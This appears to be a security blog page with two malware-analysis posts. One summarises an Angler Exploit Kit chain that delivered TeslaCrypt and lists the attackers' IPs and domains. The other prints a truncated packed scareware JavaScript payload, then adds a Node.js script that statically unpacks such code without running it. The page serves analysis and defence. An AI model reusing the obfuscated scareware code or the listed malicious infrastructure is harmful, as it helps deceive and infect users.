Angler Exploit Kit to TeslaCrypt

There's an excellent write-up by Brad Duncan in the Internet Storm Center's Handler Diaries on analyzing a compromise that used the Angler Exploit Kit to deliver TeslaCrypt. From the article:

On Wednesday 2016-02-17 at approximately 18:14 UTC, I got a full chain of events. The chain started with a compromised website that generated an admedia gate. The gate led to Angler EK. Finally, Angler EK delivered TeslaCrypt, and we saw some callback traffic from the malware.

- 178.62.122.211 - img.belayamorda.info - admedia gate
- 185.46.11.113 - ssd.summerspellman.com - Angler EK
- 192.185.39.64 -...
Read more

Unpacking Packed Javascript with Rhino In Three Steps

Malware authors use various techniques for obfuscating their code. One I commonly see is the packer compressor. Code will begin with "eval(function(p,a,c,k,e,d)". Below is a block I came across yesterday from a scareware scam site (the standard packer prelude had several characters eaten by the page extraction, restored here; the packed payload is truncated as on the original page):

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b 1F=h.q;b 2=h.22;b d=h.V;b 9=\'\'+13(h.q);b w=O(h.q,10);b T,3,s;a((3=2.f("1R/"))!=-1){d="K";9=2.c(3+4)}i a((3=2.f("K"))!=-1){d="K";9=2.c(3+6);a((3=2.f("W"))!=-1)9=2.c(3+8)}i a((3=2.f("24"))!=-1){d="1P";9=2.c(3+5)}i a((3=2.f("X"))!=-1){d="X";9=2.c(3+7)}i a((3=2.f("1t"))!=-1){d="1t";9=2.c(3+7);a((3=2.f("W"))!=-1)9=2.c(3+8)}i a((3=2.f("11"))!=-1){d="11";9=2.c(3+8)}i a((T=2.12(\' \')+1)<(3=2.12(\'/\'))){d=2.c(T,3);9=2.c(3+1);a(d.1G()==d.1E()){d=h.V}}a((s=9.f(";"))!=-1)9=9.c(0,s);a((s=9.f(" "))!=-1)9=9.c(0,s);w=O(\'\'+9,10);a(1J(w)){9=\'\'+13(h.q);w=O(h.q,10)}1r(g(){B()},1K);b m=1D v();b 16=(m.1A()+1)+"/"+m.1B()+"/"+m.1C()+" @ "+m.1H()+":"+m.1Y();b p=r(\'p\'),U=r(\'U\'),C=r(\'C\'),l=r(\'l\');g 15(){18("1L: "+p+" Q ("+U+") x "+C+"\\n\\20 21 26 29 2a 28 S "+16+".\\n\\P ("+l+") (R 1) 2b F 25!")}g 1Z(){15();b 14=D*4,A=1s.1O(\'#1M\');Z(14,A)}g B(){18(\'\\n\\1n!!\\n\\n***************************************\\n\\1o \'+p+\' Q: 1k z 1j, 1f 1g 1h z 1q, u 1i u 1p 1z 1y 1w 1x 1v...
Read more
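As an added example (not code from the post or its author): the p,a,c,k,e,d prelude is nothing more than a dictionary substitution, so an analyst can recover the payload without ever evaluating the sample. The Node.js script below reimplements that substitution: it parses the packer's argument list ('payload', base, word count, 'dictionary'.split('|')) out of the blob and replays the replacement loop. The packed sample inside it is constructed for the demonstration (a benign scareware-style snippet packed by hand in the same format), and the function names are my own.

```javascript
'use strict';

// Constructed sample in the Dean Edwards packer format: the standard prelude
// followed by ('payload', base, count, 'words'.split('|'), 0, {}).
// Index 0 is the literal "0", which the packer leaves as an empty dictionary
// entry because the word already equals its own token.
const SAMPLE_PACKED =
  "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+" +
  "((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};" +
  "if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}" +
  "k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};" +
  "while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}" +
  "('1 2=0;3 4(){2++;5.6=\"7\";8(\"9 \"+2)}',62,10," +
  "'|var|hits|function|warn|document|title|Warning|alert|Call'.split('|'),0,{}))";

// Turn a dictionary index into its base-`a` token, exactly as the prelude's e()
// does: 0-9 -> '0'-'9', 10-35 -> 'a'-'z', 36-61 -> 'A'-'Z', then multi-char.
function encodeIndex(c, a) {
  const head = c < a ? '' : encodeIndex(Math.floor(c / a), a);
  const rem = c % a;
  return head + (rem > 35 ? String.fromCharCode(rem + 29) : rem.toString(36));
}

// Replay the prelude's replacement loop: walk the dictionary from the highest
// index down and swap each token (on word boundaries) for its original word.
// A function replacer keeps '$' sequences in dictionary words literal.
function decodePacked(p, a, c, k) {
  let out = p;
  for (let i = c - 1; i >= 0; i--) {
    if (!k[i]) continue;  // empty entry: the word is already its own token
    const re = new RegExp('\\b' + encodeIndex(i, a) + '\\b', 'g');
    out = out.replace(re, () => k[i]);
  }
  return out;
}

// Read a single-quoted JS string literal starting at s[i] === "'".
// Returns [value, index just past the closing quote]; handles \' \\ \n \r \t.
function readQuoted(s, i) {
  if (s[i] !== "'") throw new Error('expected quote at offset ' + i);
  let out = '';
  for (let j = i + 1; j < s.length; j++) {
    const ch = s[j];
    if (ch === '\\') {
      const nx = s[++j];
      out += nx === 'n' ? '\n' : nx === 'r' ? '\r' : nx === 't' ? '\t' : nx;
    } else if (ch === "'") {
      return [out, j + 1];
    } else {
      out += ch;
    }
  }
  throw new Error('unterminated string literal');
}

// Pull p, a, c and k out of the packer call without executing any of it.
function extractPackerArgs(packed) {
  const start = packed.indexOf("}('");
  if (start < 0) throw new Error('no packer argument list found');
  const [p, afterP] = readQuoted(packed, start + 2);
  const m = /^,(\d+),(\d+),/.exec(packed.slice(afterP));
  if (!m) throw new Error('unexpected argument layout after payload');
  const a = parseInt(m[1], 10);
  const c = parseInt(m[2], 10);
  const [words, afterK] = readQuoted(packed, afterP + m[0].length);
  if (!packed.startsWith(".split('|')", afterK)) {
    throw new Error("expected .split('|') after the dictionary");
  }
  return { p, a, c, k: words.split('|') };
}

// Static unpack: parse the arguments, then run the substitution ourselves.
function unpack(packed) {
  const { p, a, c, k } = extractPackerArgs(packed);
  return decodePacked(p, a, c, k);
}

console.log(unpack(SAMPLE_PACKED));
```

Because the decoder never evaluates the blob, it also works on samples where the attacker has tampered with the prelude, as long as the argument list keeps the standard layout; the parser throws rather than guessing when it does not. On the page's own sample the same routine would hand back the readable browser-detection and alert() logic that the `b 1F=h.q;...` payload encodes.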